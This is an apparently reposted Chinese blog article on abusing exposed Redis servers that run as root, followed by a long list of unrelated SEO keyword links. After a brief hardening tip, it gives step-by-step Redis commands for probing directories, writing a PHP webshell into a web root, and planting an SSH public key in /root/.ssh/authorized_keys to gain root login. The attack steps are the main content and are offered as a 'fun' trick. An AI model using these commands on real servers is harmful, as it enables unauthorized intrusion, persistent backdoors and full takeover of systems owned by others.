关于Redis的一些好玩东西
发表于:2025-12-02 作者:千家信息网编辑
千家信息网最后更新 2025年12月02日,在许多服务器上部署的Redis是采用Root权限进行启动进而可以利用这个Root做许多超级权限的事情。由于REDIS是没有严格授权管理机制大家在部署一定不要设置为0.0.0.0以及最好使用requir
千家信息网最后更新 2025年12月02日关于Redis的一些好玩东西
在许多服务器上部署的Redis是采用Root权限进行启动进而可以利用这个Root做许多超级权限的事情。由于REDIS是没有严格授权管理机制大家在部署一定不要设置为0.0.0.0以及最好使用requirepass(虽然是明文但是至少增加一定的难度)。
本文主要利用的是redis提供的configsave两个命令来完成我们的HACK功能便捷的工具用歪了就成了祸害。
简单介绍几个有用的命令
config set dir $path:
这个命令是配置为了指定redis的"工作路径"之后生成的RDB和AOF文件都会存储在这里
dbfilename $name:
RDB文件名默认为"dump.rdb"
save:
将内存里的数据进行持久化操作
它们结合在一起就可以实现如下好玩的功能
1.指定文件夹是否存在
config set dir /home/bob
如果是返回(error) ERR Changing directory: No such file or directory表示没有该文件夹。
如果返回OK表示服务器上有这个文件夹并且已经将其设置为内存快照保存的文件夹
2.webshell最好使用之前进行flushdb,或者flushall清空内存里数据
1.config set dir /opt/web/www #设定网站的目录2.config set dbfilename test.php #设定将要保存的文件名3.set "" "" #我们的webshell4.save #将内存持久化到test.php
3.访问信任
1.cat ~/.ssh/id_rsa.pub > ~/foo.txt2.cat ~/foo.txt|redis -x set hack #将foo.txt里的内容保存为一个KEY为hack的字符串3.config set dir /root/.ssh/ #设定root的.ssh文件夹4.config set dbfilename authorized_keys5.save
文件
文件夹
内存
命令
功能
数据
文件名
最好
服务器
权限
服务
好玩
便捷
两个
事情
内容
字符
字符串
工具
快照
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
鄂州仓库管理软件开发
网络安全素质教育多少分及格
手抄报网络安全合理使用手机
宣州区专业软件开发服务解决方案
网络安全415机制 公安
厦门网络技术转让概况
信息网络安全监察图书
pbe服务器
网站服务器过期了怎么解决
性能最强的单机服务器
戴尔740服务器序列号怎么看
c 监控数据库的值变化
KVM服务器硬件要求
抚州互联网创业科技有限公司
南宁播放软件开发
计算机系统集成包括软件开发么
我的世界以前的生存服务器
华南理工数据库实验题
智能象棋软件开发怎么学习
信息系统数据库安全概述
山东安卓软件开发制作
计算机网络技术就业的方向
网络安全风险防范工作
网络安全员免费培训
linux服务器结束ed模式
cmd 登录服务器
丰台区信息化软件开发一体化
锐思数据库免费
虚拟服务器的历史
数据库系统的主流是什么型数据库